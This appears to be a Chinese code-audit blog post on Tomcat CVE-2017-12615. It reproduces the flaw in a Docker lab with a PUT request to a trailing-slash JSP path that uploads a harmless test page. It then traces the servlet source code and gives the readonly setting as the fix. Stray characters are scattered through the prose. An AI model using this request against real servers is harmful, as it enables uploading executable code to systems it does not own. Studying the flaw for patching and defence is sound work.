【代碼審計(jì)】Tomcat 任意文件寫入 CVE-2017-12615

0x00 環(huán)境搭建

直接 Docker 搭建即可

git clone https://github.com/vulhub/vulhub.git
cd /vulhub/tomcat/CVE-2017-12615
sudo docker-compose build
sudo docker-compose up -d

0x01 漏洞復(fù)現(xiàn)

直接使用 PUT 發(fā)起請(qǐng)求就可以上傳任意文件改执,比如向 /teamssix.jsp/ 發(fā)起請(qǐng)求

PUT /teamssix.jsp/ HTTP/1.1
Host: 172.16.214.20:8080
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 26

<%out.print("TeamsSix");%>

HTTP/1.1 201 
Content-Length: 0
Date: Wed, 15 Dec 2021 07:19:29 GMT
Connection: close

服務(wù)端返回 201 說明創(chuàng)建成功啸蜜,訪問 /teamssix.jsp 可以看到文件成功被上傳

GET /teamssix.jsp HTTP/1.1
Host: 172.16.214.20:8080
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

HTTP/1.1 200 
Set-Cookie: JSESSIONID=128419889W27F6C930EF27082B98D9FD; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8
Date: Wed, 15 Dec 2021 07:19:35 GMT
Connection: close

TeamsSix
image

0x02 漏洞分析

Tomcat 在處理時(shí)有兩個(gè)默認(rèn)的 Servlet,分別為 DefaultServlet 和 JspServlet辈挂,具體配置如下:

   <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

……

 <servlet>
        <servlet-name>jsp</servlet-name>
        <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
        <init-param>
            <param-name>fork</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
            <param-name>xpoweredBy</param-name>
            <param-value>false</param-value>
        </init-param>
        <load-on-startup>3</load-on-startup>
    </servlet>

……

    <!-- The mapping for the default servlet -->
    <servlet-mapping>
        <servlet-name>default</servlet-name>
        <url-pattern>/</url-pattern>
    </servlet-mapping>

    <!-- The mappings for the JSP servlet -->
    <servlet-mapping>
        <servlet-name>jsp</servlet-name>
        <url-pattern>*.jsp</url-pattern>
        <url-pattern>*.jspx</url-pattern>
    </servlet-mapping>

從配置文件里可以看到對(duì)于后綴為 .jsp 和 .jspx 的請(qǐng)求由 JspServlet 處理衬横,而其他的請(qǐng)求則由 DefaultServlet 處理。

所以當(dāng)請(qǐng)求 /teamssix.jsp 時(shí)將會(huì)由 JspServlet 處理终蒂,無法觸發(fā)漏洞蜂林;而請(qǐng)求 /teamssix.jsp/ 將繞過這個(gè)限制,交由 DefaultServlet 處理拇泣,這時(shí)就可以觸發(fā)漏洞了噪叙。

要想實(shí)現(xiàn)一個(gè) Servlet,就需要繼承 HTTPServlet霉翔,找到 HTTPServlet 文件為 /tomcat/lib/servlet-api.jar!/javax/servlet/http/HttpServlet.class

在 HTTPServlet 中找到 doPut 方法睁蕾,然后找到 DefaultServlet 里重寫的 doPut 方法路徑為tomcat/lib/catalina.jar!/org/apache/catalina/servlets/DefaultServlet.class

查看 DefaultServlet 的 doPut 方法

protected void doPut(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    if (this.readOnly) {
        resp.sendError(403);
    } else {
        String path = this.getRelativePath(req);
        WebResource resource = this.resources.getResource(path);
        DefaultServlet.Range range = this.parseContentRange(req, resp);
        Object resourceInputStream = null;

        try {
            if (range != null) {
                File contentFile = this.executePartialPut(req, range, path);
                resourceInputStream = new FileInputStream(contentFile);
            } else {
                resourceInputStream = req.getInputStream();
            }

            if (this.resources.write(path, (InputStream)resourceInputStream, true)) {
                if (resource.exists()) {
                    resp.setStatus(204);
                } else {
                    resp.setStatus(201);
                }
            } else {
                resp.sendError(409);
            }
        } finally {
            if (resourceInputStream != null) {
                try {
                    ((InputStream)resourceInputStream).close();
                } catch (IOException var13) {
                }
            }
        }
    }
}

從上面代碼的第 2 行可以看到首先判斷 readOnly 是否為真,如果為真則返回 403债朵,因此可以直接把 web.xml 里的 DefaultServlet 的 readonly 由原來的 false 改為 true 就能防御這個(gè)漏洞了子眶。

繼續(xù)回到 DefaultServlet.class 里,在 DefaultServlet.class 里可以看到有個(gè) write 函數(shù)序芦,通過這個(gè) write 函數(shù)代碼跟蹤到 tomcat/lib/catalina.jar!/org/apache/catalina/webresources/DirResourceSet.class 里的 write 函數(shù)

public boolean write(String path, InputStream is, boolean overwrite) {
    this.checkPath(path);
    if (is == null) {
        throw new NullPointerException(sm.getString("dirResourceSet.writeNpe"));
    } else if (this.isReadOnly()) {
        return false;
    } else {
        File dest = null;
        String webAppMount = this.getWebAppMount();
        if (path.startsWith(webAppMount)) {
            dest = this.file(path.substring(webAppMount.length()), false);
            if (dest == null) {
                return false;
            } else if (dest.exists() && !overwrite) {
                return false;
            } else {
                try {
                    if (overwrite) {
                        Files.copy(is, dest.toPath(), new CopyOption[]{StandardCopyOption.REPLACE_EXISTING});
                    } else {
                        Files.copy(is, dest.toPath(), new CopyOption[0]);
                    }
                    return true;
                } catch (IOException var7) {
                    return false;
                }
            }
        } else {
            return false;
        }
    }
}

在執(zhí)行到dest = this.file(path.substring(webAppMount.length()), false); 時(shí)臭杰,path 會(huì)作為參數(shù)傳入,執(zhí)行 file 方法谚中,file 方法部分代碼如下

protected final File file(String name, boolean mustExist) {
    if (name.equals("/")) {
        name = "";
    }
    File file = new File(this.fileBase, name);

在執(zhí)行到 File file = new File(this.fileBase, name);時(shí)渴杆,會(huì)實(shí)例化一個(gè) File 對(duì)象,fileBase 是 Web 應(yīng)用所在的絕對(duì)路徑宪塔。

這里的 name 就是傳入的文件名磁奖,比如 /teamssix.jsp/殷蛇,在 File 實(shí)例化的過程中會(huì)處理掉 /登馒,因此 /teamssix.jsp/ 會(huì)變成 /teamssix.jsp

所以通過 PUT 請(qǐng)求,利用 /teamssix.jsp/ 可以達(dá)到任意文件上傳的目的场钉。

參考文章:

https://xz.aliyun.com/t/5610

原文鏈接:

https://www.teamssix.com/211216-172616.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末来吩,一起剝皮案震驚了整個(gè)濱河市敢辩,隨后出現(xiàn)的幾起案子蔽莱,更是在濱河造成了極大的恐慌,老刑警劉巖戚长,帶你破解...
    沈念sama閱讀 217,657評(píng)論 6 505
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件盗冷,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡同廉,警方通過查閱死者的電腦和手機(jī)仪糖,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,889評(píng)論 3 394
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來迫肖,“玉大人锅劝,你說我怎么就攤上這事◇『” “怎么了故爵?”我有些...
    開封第一講書人閱讀 164,057評(píng)論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長隅津。 經(jīng)常有香客問我诬垂,道長,這世上最難降的妖魔是什么伦仍? 我笑而不...
    開封第一講書人閱讀 58,509評(píng)論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任结窘,我火速辦了婚禮,結(jié)果婚禮上充蓝,老公的妹妹穿的比我還像新娘隧枫。我一直安慰自己,他們只是感情好谓苟,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,562評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布悠垛。 她就那樣靜靜地躺著,像睡著了一般娜谊。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上斤讥,一...
    開封第一講書人閱讀 51,443評(píng)論 1 302
  • 城市分裂傳說
    那天纱皆,我揣著相機(jī)與錄音,去河邊找鬼芭商。 笑死派草,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的铛楣。 我是一名探鬼主播近迁,決...
    沈念sama閱讀 40,251評(píng)論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼簸州!你這毒婦竟也來了鉴竭?” 一聲冷哼從身側(cè)響起歧譬,我...
    開封第一講書人閱讀 39,129評(píng)論 0 276
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎搏存,沒想到半個(gè)月后瑰步,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,561評(píng)論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡璧眠,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,779評(píng)論 3 335
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年缩焦,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片责静。...
    茶點(diǎn)故事閱讀 39,902評(píng)論 1 348
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡袁滥,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出灾螃,到底是詐尸還是另有隱情题翻,我是刑警寧澤,帶...
    沈念sama閱讀 35,621評(píng)論 5 345
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布睦焕,位于F島的核電站藐握,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏垃喊。R本人自食惡果不足惜猾普,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,220評(píng)論 3 328
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望本谜。 院中可真熱鬧初家,春花似錦、人聲如沸乌助。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,838評(píng)論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽他托。三九已至掖肋,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間赏参,已是汗流浹背志笼。 一陣腳步聲響...
    開封第一講書人閱讀 32,971評(píng)論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留把篓,地道東北人纫溃。 一個(gè)月前我還...
    沈念sama閱讀 48,025評(píng)論 2 370
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像韧掩,于是被迫代替她去往敵國和親紊浩。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,843評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容